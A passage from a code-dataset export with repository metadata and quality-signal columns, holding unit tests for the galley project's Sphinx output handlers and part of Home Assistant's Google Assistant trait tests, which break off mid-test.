hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8a1b0ef48e7f487cff69b0215a3359dc6beb9621
| 8,075
|
py
|
Python
|
tests/worker/test_outputhandlers.py
|
pybee/galley
|
d3bff4b64df03cc6576ebb7546e1ecacbb48e02a
|
[
"BSD-3-Clause"
] | 21
|
2015-01-21T23:56:56.000Z
|
2018-09-05T06:36:55.000Z
|
tests/worker/test_outputhandlers.py
|
pybee/galley
|
d3bff4b64df03cc6576ebb7546e1ecacbb48e02a
|
[
"BSD-3-Clause"
] | 9
|
2015-01-22T01:57:27.000Z
|
2018-04-09T04:03:32.000Z
|
tests/worker/test_outputhandlers.py
|
pybee/galley
|
d3bff4b64df03cc6576ebb7546e1ecacbb48e02a
|
[
"BSD-3-Clause"
] | 7
|
2015-01-21T23:57:00.000Z
|
2017-01-14T01:24:35.000Z
|
import unittest
try:
from Queue import Queue
except ImportError:
from queue import Queue # python 3.x
from galley.worker import (
ANSIOutputHandler,
SphinxStatusHandler,
SphinxWarningHandler,
Output,
WarningOutput,
Progress,
)
class ANSIOutputHandlerTest(unittest.TestCase):
def setUp(self):
self.queue = Queue()
self.handler = ANSIOutputHandler(self.queue)
def test_simple_string(self):
"A simple string can be output and flushed"
self.handler.write("hello world")
self.handler.flush()
output = self.queue.get(block=False)
self.assertEqual(output, Output(message='hello world'))
# Nothing left in the queue
self.assertTrue(self.queue.empty())
def test_single_param_ansi_string(self):
self.handler.write("hello\x1b[1m world")
self.handler.flush()
output = self.queue.get(block=False)
self.assertEqual(output, Output(message='hello world'))
# Nothing left in the queue
self.assertTrue(self.queue.empty())
def test_multi_param_ansi_string(self):
self.handler.write("hello\x1b[32;40m world")
self.handler.flush()
output = self.queue.get(block=False)
self.assertEqual(output, Output(message='hello world'))
# Nothing left in the queue
self.assertTrue(self.queue.empty())
def test_newline_flush(self):
self.handler.write("hello world\ngoodbye world\n")
output = self.queue.get(block=False)
self.assertEqual(output, Output(message='hello world'))
output = self.queue.get(block=False)
self.assertEqual(output, Output(message='goodbye world'))
# Nothing left in the queue
self.assertTrue(self.queue.empty())
def test_carriage_return_flush(self):
self.handler.write("hello world\rgoodbye world\r")
output = self.queue.get(block=False)
self.assertEqual(output, Output(message='hello world'))
output = self.queue.get(block=False)
self.assertEqual(output, Output(message='goodbye world'))
# Nothing left in the queue
self.assertTrue(self.queue.empty())
class SphinxStatusHandlerTest(unittest.TestCase):
def setUp(self):
self.queue = Queue()
self.handler = SphinxStatusHandler(self.queue)
def test_simple_message(self):
"A simple string can be output and flushed"
self.handler.write("hello world")
self.handler.flush()
output = self.queue.get(block=False)
self.assertEqual(output, Output(message='hello world'))
# Nothing left in the queue
self.assertTrue(self.queue.empty())
def test_stripping(self):
"Messages are stripped; empty messages aren't sent"
self.handler.write(" prefix\nsuffix \n \n\n both ")
self.handler.flush()
output = self.queue.get(block=False)
self.assertEqual(output, Output(message='prefix'))
output = self.queue.get(block=False)
self.assertEqual(output, Output(message='suffix'))
output = self.queue.get(block=False)
self.assertEqual(output, Output(message='both'))
# Nothing left in the queue
self.assertTrue(self.queue.empty())
def test_simple_progress(self):
"Simple tasks are identified and reported."
# Output the initial message:
self.handler.write("dumping object inventory...")
self.handler.flush()
# Only the raw output is returned
output = self.queue.get(block=False)
self.assertEqual(output, Output(message="dumping object inventory..."))
# Nothing left in the queue
self.assertTrue(self.queue.empty())
# Output the completion message
self.handler.write("done")
self.handler.flush()
# The raw output *and* the progress message is output.
output = self.queue.get(block=False)
self.assertEqual(output, Output(message="done"))
output = self.queue.get(block=False)
self.assertEqual(output, Progress(stage='dumping object inventory', progress=100, context=None))
# Nothing left in the queue
self.assertTrue(self.queue.empty())
# Task state has been flushed
self.handler.write("More stuff done.")
self.handler.flush()
# The raw output *and* the progress message is output.
output = self.queue.get(block=False)
self.assertEqual(output, Output(message="More stuff done."))
# Nothing left in the queue
self.assertTrue(self.queue.empty())
def test_percent_progress(self):
"Progress indicators are extracted and sent as parsed messages"
self.handler.write("copying downloadable files... [ 2%] /path/to/file.sh")
self.handler.flush()
self.handler.write("copying downloadable files... [ 80%] /path/to/other_file.bat")
self.handler.flush()
self.handler.write("copying downloadable files... [100%] /path/to/3rd-file.sh")
self.handler.flush()
# Output comes in pairs -- a normal output with the full message, then a parsed output.
output = self.queue.get(block=False)
self.assertEqual(output, Output(message="copying downloadable files... [ 2%] /path/to/file.sh"))
output = self.queue.get(block=False)
self.assertEqual(output, Progress(stage='copying downloadable files', progress=2, context='/path/to/file.sh'))
output = self.queue.get(block=False)
self.assertEqual(output, Output(message="copying downloadable files... [ 80%] /path/to/other_file.bat"))
output = self.queue.get(block=False)
self.assertEqual(output, Progress(stage='copying downloadable files', progress=80, context='/path/to/other_file.bat'))
output = self.queue.get(block=False)
self.assertEqual(output, Output(message="copying downloadable files... [100%] /path/to/3rd-file.sh"))
output = self.queue.get(block=False)
self.assertEqual(output, Progress(stage='copying downloadable files', progress=100, context='/path/to/3rd-file.sh'))
# Nothing left in the queue
self.assertTrue(self.queue.empty())
class SphinxWarningHandlerTest(unittest.TestCase):
def setUp(self):
self.queue = Queue()
self.handler = SphinxWarningHandler(self.queue)
def test_global_warning(self):
"A gloabl warning message is parsed correctly"
self.handler.write("WARNING: html_static_path entry '/beeware/galley/docs/_static' does not exist")
self.handler.flush()
output = self.queue.get(block=False)
self.assertEqual(output, WarningOutput(filename=None, lineno=None, message="html_static_path entry '/beeware/galley/docs/_static' does not exist"))
# Nothing left in the queue
self.assertTrue(self.queue.empty())
def test_file_warning(self):
"A warning message that mentions a filename is parsed for file name/number content"
self.handler.write("/beeware/galley/docs/internals/newfile.rst:: WARNING: document isn't included in any toctree")
self.handler.flush()
output = self.queue.get(block=False)
self.assertEqual(output, WarningOutput(filename='/beeware/galley/docs/internals/newfile.rst', lineno=None, message="document isn't included in any toctree"))
# Nothing left in the queue
self.assertTrue(self.queue.empty())
def test_file_warning(self):
"A warning message that mentions a filename is parsed for file name/number content"
self.handler.write("/beeware/galley/docs/index.rst:65: WARNING: toctree glob pattern u'releases' didn't match any documents")
self.handler.flush()
output = self.queue.get(block=False)
self.assertEqual(output, WarningOutput(filename='/beeware/galley/docs/index.rst', lineno=65, message="toctree glob pattern u'releases' didn't match any documents"))
# Nothing left in the queue
self.assertTrue(self.queue.empty())
| 36.049107
| 172
| 0.665139
| 1,000
| 8,075
| 5.334
| 0.16
| 0.074241
| 0.067492
| 0.08099
| 0.78384
| 0.766779
| 0.756655
| 0.731534
| 0.724409
| 0.67754
| 0
| 0.005702
| 0.218081
| 8,075
| 223
| 173
| 36.210762
| 0.839088
| 0.140186
| 0
| 0.540146
| 0
| 0.014599
| 0.244978
| 0.037866
| 0
| 0
| 0
| 0
| 0.277372
| 1
| 0.109489
| false
| 0
| 0.036496
| 0
| 0.167883
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8a1d7384729b04b7f9c82fdeb3c5b26953684ce3
| 55,320
|
py
|
Python
|
tests/components/google_assistant/test_trait.py
|
Martwall/home-assistant
|
d377da80a469facfd722d065ecd60610190d9064
|
[
"Apache-2.0"
] | 1
|
2019-12-15T16:49:37.000Z
|
2019-12-15T16:49:37.000Z
|
tests/components/google_assistant/test_trait.py
|
Martwall/home-assistant
|
d377da80a469facfd722d065ecd60610190d9064
|
[
"Apache-2.0"
] | null | null | null |
tests/components/google_assistant/test_trait.py
|
Martwall/home-assistant
|
d377da80a469facfd722d065ecd60610190d9064
|
[
"Apache-2.0"
] | null | null | null |
"""Tests for the Google Assistant traits."""
import logging
from unittest.mock import Mock, patch
import pytest
from homeassistant.components import (
alarm_control_panel,
binary_sensor,
camera,
cover,
fan,
group,
input_boolean,
light,
lock,
media_player,
scene,
script,
sensor,
switch,
vacuum,
)
from homeassistant.components.climate import const as climate
from homeassistant.components.google_assistant import const, error, helpers, trait
from homeassistant.const import (
ATTR_ASSUMED_STATE,
ATTR_DEVICE_CLASS,
ATTR_ENTITY_ID,
ATTR_SUPPORTED_FEATURES,
ATTR_TEMPERATURE,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_ALARM_ARMED_AWAY,
STATE_ALARM_DISARMED,
STATE_ALARM_PENDING,
STATE_OFF,
STATE_ON,
STATE_UNKNOWN,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
)
from homeassistant.core import DOMAIN as HA_DOMAIN, EVENT_CALL_SERVICE, State
from homeassistant.util import color
from . import BASIC_CONFIG, MockConfig
from tests.common import async_mock_service, mock_coro
_LOGGER = logging.getLogger(__name__)
REQ_ID = "ff36a3cc-ec34-11e6-b1a0-64510650abcf"
BASIC_DATA = helpers.RequestData(BASIC_CONFIG, "test-agent", REQ_ID, None)
PIN_CONFIG = MockConfig(secure_devices_pin="1234")
PIN_DATA = helpers.RequestData(PIN_CONFIG, "test-agent", REQ_ID, None)
async def test_brightness_light(hass):
"""Test brightness trait support for light domain."""
assert helpers.get_google_type(light.DOMAIN, None) is not None
assert trait.BrightnessTrait.supported(light.DOMAIN, light.SUPPORT_BRIGHTNESS, None)
trt = trait.BrightnessTrait(
hass,
State("light.bla", light.STATE_ON, {light.ATTR_BRIGHTNESS: 243}),
BASIC_CONFIG,
)
assert trt.sync_attributes() == {}
assert trt.query_attributes() == {"brightness": 95}
events = []
hass.bus.async_listen(EVENT_CALL_SERVICE, events.append)
calls = async_mock_service(hass, light.DOMAIN, light.SERVICE_TURN_ON)
await trt.execute(
trait.COMMAND_BRIGHTNESS_ABSOLUTE, BASIC_DATA, {"brightness": 50}, {}
)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data == {ATTR_ENTITY_ID: "light.bla", light.ATTR_BRIGHTNESS_PCT: 50}
assert len(events) == 1
assert events[0].data == {
"domain": "light",
"service": "turn_on",
"service_data": {"brightness_pct": 50, "entity_id": "light.bla"},
}
async def test_camera_stream(hass):
"""Test camera stream trait support for camera domain."""
hass.config.api = Mock(base_url="http://1.1.1.1:8123")
assert helpers.get_google_type(camera.DOMAIN, None) is not None
assert trait.CameraStreamTrait.supported(camera.DOMAIN, camera.SUPPORT_STREAM, None)
trt = trait.CameraStreamTrait(
hass, State("camera.bla", camera.STATE_IDLE, {}), BASIC_CONFIG
)
assert trt.sync_attributes() == {
"cameraStreamSupportedProtocols": ["hls"],
"cameraStreamNeedAuthToken": False,
"cameraStreamNeedDrmEncryption": False,
}
assert trt.query_attributes() == {}
with patch(
"homeassistant.components.camera.async_request_stream",
return_value=mock_coro("/api/streams/bla"),
):
await trt.execute(trait.COMMAND_GET_CAMERA_STREAM, BASIC_DATA, {}, {})
assert trt.query_attributes() == {
"cameraStreamAccessUrl": "http://1.1.1.1:8123/api/streams/bla"
}
async def test_onoff_group(hass):
"""Test OnOff trait support for group domain."""
assert helpers.get_google_type(group.DOMAIN, None) is not None
assert trait.OnOffTrait.supported(group.DOMAIN, 0, None)
trt_on = trait.OnOffTrait(hass, State("group.bla", STATE_ON), BASIC_CONFIG)
assert trt_on.sync_attributes() == {}
assert trt_on.query_attributes() == {"on": True}
trt_off = trait.OnOffTrait(hass, State("group.bla", STATE_OFF), BASIC_CONFIG)
assert trt_off.query_attributes() == {"on": False}
on_calls = async_mock_service(hass, HA_DOMAIN, SERVICE_TURN_ON)
await trt_on.execute(trait.COMMAND_ONOFF, BASIC_DATA, {"on": True}, {})
assert len(on_calls) == 1
assert on_calls[0].data == {ATTR_ENTITY_ID: "group.bla"}
off_calls = async_mock_service(hass, HA_DOMAIN, SERVICE_TURN_OFF)
await trt_on.execute(trait.COMMAND_ONOFF, BASIC_DATA, {"on": False}, {})
assert len(off_calls) == 1
assert off_calls[0].data == {ATTR_ENTITY_ID: "group.bla"}
async def test_onoff_input_boolean(hass):
"""Test OnOff trait support for input_boolean domain."""
assert helpers.get_google_type(input_boolean.DOMAIN, None) is not None
assert trait.OnOffTrait.supported(input_boolean.DOMAIN, 0, None)
trt_on = trait.OnOffTrait(hass, State("input_boolean.bla", STATE_ON), BASIC_CONFIG)
assert trt_on.sync_attributes() == {}
assert trt_on.query_attributes() == {"on": True}
trt_off = trait.OnOffTrait(
hass, State("input_boolean.bla", STATE_OFF), BASIC_CONFIG
)
assert trt_off.query_attributes() == {"on": False}
on_calls = async_mock_service(hass, input_boolean.DOMAIN, SERVICE_TURN_ON)
await trt_on.execute(trait.COMMAND_ONOFF, BASIC_DATA, {"on": True}, {})
assert len(on_calls) == 1
assert on_calls[0].data == {ATTR_ENTITY_ID: "input_boolean.bla"}
off_calls = async_mock_service(hass, input_boolean.DOMAIN, SERVICE_TURN_OFF)
await trt_on.execute(trait.COMMAND_ONOFF, BASIC_DATA, {"on": False}, {})
assert len(off_calls) == 1
assert off_calls[0].data == {ATTR_ENTITY_ID: "input_boolean.bla"}
async def test_onoff_switch(hass):
"""Test OnOff trait support for switch domain."""
assert helpers.get_google_type(switch.DOMAIN, None) is not None
assert trait.OnOffTrait.supported(switch.DOMAIN, 0, None)
trt_on = trait.OnOffTrait(hass, State("switch.bla", STATE_ON), BASIC_CONFIG)
assert trt_on.sync_attributes() == {}
assert trt_on.query_attributes() == {"on": True}
trt_off = trait.OnOffTrait(hass, State("switch.bla", STATE_OFF), BASIC_CONFIG)
assert trt_off.query_attributes() == {"on": False}
on_calls = async_mock_service(hass, switch.DOMAIN, SERVICE_TURN_ON)
await trt_on.execute(trait.COMMAND_ONOFF, BASIC_DATA, {"on": True}, {})
assert len(on_calls) == 1
assert on_calls[0].data == {ATTR_ENTITY_ID: "switch.bla"}
off_calls = async_mock_service(hass, switch.DOMAIN, SERVICE_TURN_OFF)
await trt_on.execute(trait.COMMAND_ONOFF, BASIC_DATA, {"on": False}, {})
assert len(off_calls) == 1
assert off_calls[0].data == {ATTR_ENTITY_ID: "switch.bla"}
async def test_onoff_fan(hass):
"""Test OnOff trait support for fan domain."""
assert helpers.get_google_type(fan.DOMAIN, None) is not None
assert trait.OnOffTrait.supported(fan.DOMAIN, 0, None)
trt_on = trait.OnOffTrait(hass, State("fan.bla", STATE_ON), BASIC_CONFIG)
assert trt_on.sync_attributes() == {}
assert trt_on.query_attributes() == {"on": True}
trt_off = trait.OnOffTrait(hass, State("fan.bla", STATE_OFF), BASIC_CONFIG)
assert trt_off.query_attributes() == {"on": False}
on_calls = async_mock_service(hass, fan.DOMAIN, SERVICE_TURN_ON)
await trt_on.execute(trait.COMMAND_ONOFF, BASIC_DATA, {"on": True}, {})
assert len(on_calls) == 1
assert on_calls[0].data == {ATTR_ENTITY_ID: "fan.bla"}
off_calls = async_mock_service(hass, fan.DOMAIN, SERVICE_TURN_OFF)
await trt_on.execute(trait.COMMAND_ONOFF, BASIC_DATA, {"on": False}, {})
assert len(off_calls) == 1
assert off_calls[0].data == {ATTR_ENTITY_ID: "fan.bla"}
async def test_onoff_light(hass):
"""Test OnOff trait support for light domain."""
assert helpers.get_google_type(light.DOMAIN, None) is not None
assert trait.OnOffTrait.supported(light.DOMAIN, 0, None)
trt_on = trait.OnOffTrait(hass, State("light.bla", STATE_ON), BASIC_CONFIG)
assert trt_on.sync_attributes() == {}
assert trt_on.query_attributes() == {"on": True}
trt_off = trait.OnOffTrait(hass, State("light.bla", STATE_OFF), BASIC_CONFIG)
assert trt_off.query_attributes() == {"on": False}
on_calls = async_mock_service(hass, light.DOMAIN, SERVICE_TURN_ON)
await trt_on.execute(trait.COMMAND_ONOFF, BASIC_DATA, {"on": True}, {})
assert len(on_calls) == 1
assert on_calls[0].data == {ATTR_ENTITY_ID: "light.bla"}
off_calls = async_mock_service(hass, light.DOMAIN, SERVICE_TURN_OFF)
await trt_on.execute(trait.COMMAND_ONOFF, BASIC_DATA, {"on": False}, {})
assert len(off_calls) == 1
assert off_calls[0].data == {ATTR_ENTITY_ID: "light.bla"}
async def test_onoff_media_player(hass):
"""Test OnOff trait support for media_player domain."""
assert helpers.get_google_type(media_player.DOMAIN, None) is not None
assert trait.OnOffTrait.supported(media_player.DOMAIN, 0, None)
trt_on = trait.OnOffTrait(hass, State("media_player.bla", STATE_ON), BASIC_CONFIG)
assert trt_on.sync_attributes() == {}
assert trt_on.query_attributes() == {"on": True}
trt_off = trait.OnOffTrait(hass, State("media_player.bla", STATE_OFF), BASIC_CONFIG)
assert trt_off.query_attributes() == {"on": False}
on_calls = async_mock_service(hass, media_player.DOMAIN, SERVICE_TURN_ON)
await trt_on.execute(trait.COMMAND_ONOFF, BASIC_DATA, {"on": True}, {})
assert len(on_calls) == 1
assert on_calls[0].data == {ATTR_ENTITY_ID: "media_player.bla"}
off_calls = async_mock_service(hass, media_player.DOMAIN, SERVICE_TURN_OFF)
await trt_on.execute(trait.COMMAND_ONOFF, BASIC_DATA, {"on": False}, {})
assert len(off_calls) == 1
assert off_calls[0].data == {ATTR_ENTITY_ID: "media_player.bla"}
async def test_dock_vacuum(hass):
"""Test dock trait support for vacuum domain."""
assert helpers.get_google_type(vacuum.DOMAIN, None) is not None
assert trait.DockTrait.supported(vacuum.DOMAIN, 0, None)
trt = trait.DockTrait(hass, State("vacuum.bla", vacuum.STATE_IDLE), BASIC_CONFIG)
assert trt.sync_attributes() == {}
assert trt.query_attributes() == {"isDocked": False}
calls = async_mock_service(hass, vacuum.DOMAIN, vacuum.SERVICE_RETURN_TO_BASE)
await trt.execute(trait.COMMAND_DOCK, BASIC_DATA, {}, {})
assert len(calls) == 1
assert calls[0].data == {ATTR_ENTITY_ID: "vacuum.bla"}
async def test_startstop_vacuum(hass):
"""Test startStop trait support for vacuum domain."""
assert helpers.get_google_type(vacuum.DOMAIN, None) is not None
assert trait.StartStopTrait.supported(vacuum.DOMAIN, 0, None)
trt = trait.StartStopTrait(
hass,
State(
"vacuum.bla",
vacuum.STATE_PAUSED,
{ATTR_SUPPORTED_FEATURES: vacuum.SUPPORT_PAUSE},
),
BASIC_CONFIG,
)
assert trt.sync_attributes() == {"pausable": True}
assert trt.query_attributes() == {"isRunning": False, "isPaused": True}
start_calls = async_mock_service(hass, vacuum.DOMAIN, vacuum.SERVICE_START)
await trt.execute(trait.COMMAND_STARTSTOP, BASIC_DATA, {"start": True}, {})
assert len(start_calls) == 1
assert start_calls[0].data == {ATTR_ENTITY_ID: "vacuum.bla"}
stop_calls = async_mock_service(hass, vacuum.DOMAIN, vacuum.SERVICE_STOP)
await trt.execute(trait.COMMAND_STARTSTOP, BASIC_DATA, {"start": False}, {})
assert len(stop_calls) == 1
assert stop_calls[0].data == {ATTR_ENTITY_ID: "vacuum.bla"}
pause_calls = async_mock_service(hass, vacuum.DOMAIN, vacuum.SERVICE_PAUSE)
await trt.execute(trait.COMMAND_PAUSEUNPAUSE, BASIC_DATA, {"pause": True}, {})
assert len(pause_calls) == 1
assert pause_calls[0].data == {ATTR_ENTITY_ID: "vacuum.bla"}
unpause_calls = async_mock_service(hass, vacuum.DOMAIN, vacuum.SERVICE_START)
await trt.execute(trait.COMMAND_PAUSEUNPAUSE, BASIC_DATA, {"pause": False}, {})
assert len(unpause_calls) == 1
assert unpause_calls[0].data == {ATTR_ENTITY_ID: "vacuum.bla"}
async def test_color_setting_color_light(hass):
"""Test ColorSpectrum trait support for light domain."""
assert helpers.get_google_type(light.DOMAIN, None) is not None
assert not trait.ColorSettingTrait.supported(light.DOMAIN, 0, None)
assert trait.ColorSettingTrait.supported(light.DOMAIN, light.SUPPORT_COLOR, None)
trt = trait.ColorSettingTrait(
hass,
State(
"light.bla",
STATE_ON,
{
light.ATTR_HS_COLOR: (20, 94),
light.ATTR_BRIGHTNESS: 200,
ATTR_SUPPORTED_FEATURES: light.SUPPORT_COLOR,
},
),
BASIC_CONFIG,
)
assert trt.sync_attributes() == {"colorModel": "hsv"}
assert trt.query_attributes() == {
"color": {"spectrumHsv": {"hue": 20, "saturation": 0.94, "value": 200 / 255}}
}
assert trt.can_execute(
trait.COMMAND_COLOR_ABSOLUTE, {"color": {"spectrumRGB": 16715792}}
)
calls = async_mock_service(hass, light.DOMAIN, SERVICE_TURN_ON)
await trt.execute(
trait.COMMAND_COLOR_ABSOLUTE,
BASIC_DATA,
{"color": {"spectrumRGB": 1052927}},
{},
)
assert len(calls) == 1
assert calls[0].data == {
ATTR_ENTITY_ID: "light.bla",
light.ATTR_HS_COLOR: (240, 93.725),
}
await trt.execute(
trait.COMMAND_COLOR_ABSOLUTE,
BASIC_DATA,
{"color": {"spectrumHSV": {"hue": 100, "saturation": 0.50, "value": 0.20}}},
{},
)
assert len(calls) == 2
assert calls[1].data == {
ATTR_ENTITY_ID: "light.bla",
light.ATTR_HS_COLOR: [100, 50],
light.ATTR_BRIGHTNESS: 0.2 * 255,
}
async def test_color_setting_temperature_light(hass):
"""Test ColorTemperature trait support for light domain."""
assert helpers.get_google_type(light.DOMAIN, None) is not None
assert not trait.ColorSettingTrait.supported(light.DOMAIN, 0, None)
assert trait.ColorSettingTrait.supported(
light.DOMAIN, light.SUPPORT_COLOR_TEMP, None
)
trt = trait.ColorSettingTrait(
hass,
State(
"light.bla",
STATE_ON,
{
light.ATTR_MIN_MIREDS: 200,
light.ATTR_COLOR_TEMP: 300,
light.ATTR_MAX_MIREDS: 500,
ATTR_SUPPORTED_FEATURES: light.SUPPORT_COLOR_TEMP,
},
),
BASIC_CONFIG,
)
assert trt.sync_attributes() == {
"colorTemperatureRange": {"temperatureMinK": 2000, "temperatureMaxK": 5000}
}
assert trt.query_attributes() == {"color": {"temperatureK": 3333}}
assert trt.can_execute(
trait.COMMAND_COLOR_ABSOLUTE, {"color": {"temperature": 400}}
)
calls = async_mock_service(hass, light.DOMAIN, SERVICE_TURN_ON)
with pytest.raises(helpers.SmartHomeError) as err:
await trt.execute(
trait.COMMAND_COLOR_ABSOLUTE,
BASIC_DATA,
{"color": {"temperature": 5555}},
{},
)
assert err.value.code == const.ERR_VALUE_OUT_OF_RANGE
await trt.execute(
trait.COMMAND_COLOR_ABSOLUTE, BASIC_DATA, {"color": {"temperature": 2857}}, {}
)
assert len(calls) == 1
assert calls[0].data == {
ATTR_ENTITY_ID: "light.bla",
light.ATTR_COLOR_TEMP: color.color_temperature_kelvin_to_mired(2857),
}
async def test_color_light_temperature_light_bad_temp(hass):
"""Test ColorTemperature trait support for light domain."""
assert helpers.get_google_type(light.DOMAIN, None) is not None
assert not trait.ColorSettingTrait.supported(light.DOMAIN, 0, None)
assert trait.ColorSettingTrait.supported(
light.DOMAIN, light.SUPPORT_COLOR_TEMP, None
)
trt = trait.ColorSettingTrait(
hass,
State(
"light.bla",
STATE_ON,
{
light.ATTR_MIN_MIREDS: 200,
light.ATTR_COLOR_TEMP: 0,
light.ATTR_MAX_MIREDS: 500,
},
),
BASIC_CONFIG,
)
assert trt.query_attributes() == {}
async def test_scene_scene(hass):
"""Test Scene trait support for scene domain."""
assert helpers.get_google_type(scene.DOMAIN, None) is not None
assert trait.SceneTrait.supported(scene.DOMAIN, 0, None)
trt = trait.SceneTrait(hass, State("scene.bla", scene.STATE), BASIC_CONFIG)
assert trt.sync_attributes() == {}
assert trt.query_attributes() == {}
assert trt.can_execute(trait.COMMAND_ACTIVATE_SCENE, {})
calls = async_mock_service(hass, scene.DOMAIN, SERVICE_TURN_ON)
await trt.execute(trait.COMMAND_ACTIVATE_SCENE, BASIC_DATA, {}, {})
assert len(calls) == 1
assert calls[0].data == {ATTR_ENTITY_ID: "scene.bla"}
async def test_scene_script(hass):
"""Test Scene trait support for script domain."""
assert helpers.get_google_type(script.DOMAIN, None) is not None
assert trait.SceneTrait.supported(script.DOMAIN, 0, None)
trt = trait.SceneTrait(hass, State("script.bla", STATE_OFF), BASIC_CONFIG)
assert trt.sync_attributes() == {}
assert trt.query_attributes() == {}
assert trt.can_execute(trait.COMMAND_ACTIVATE_SCENE, {})
calls = async_mock_service(hass, script.DOMAIN, SERVICE_TURN_ON)
await trt.execute(trait.COMMAND_ACTIVATE_SCENE, BASIC_DATA, {}, {})
# We don't wait till script execution is done.
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data == {ATTR_ENTITY_ID: "script.bla"}
async def test_temperature_setting_climate_onoff(hass):
"""Test TemperatureSetting trait support for climate domain - range."""
assert helpers.get_google_type(climate.DOMAIN, None) is not None
assert trait.TemperatureSettingTrait.supported(climate.DOMAIN, 0, None)
hass.config.units.temperature_unit = TEMP_FAHRENHEIT
trt = trait.TemperatureSettingTrait(
hass,
State(
"climate.bla",
climate.HVAC_MODE_AUTO,
{
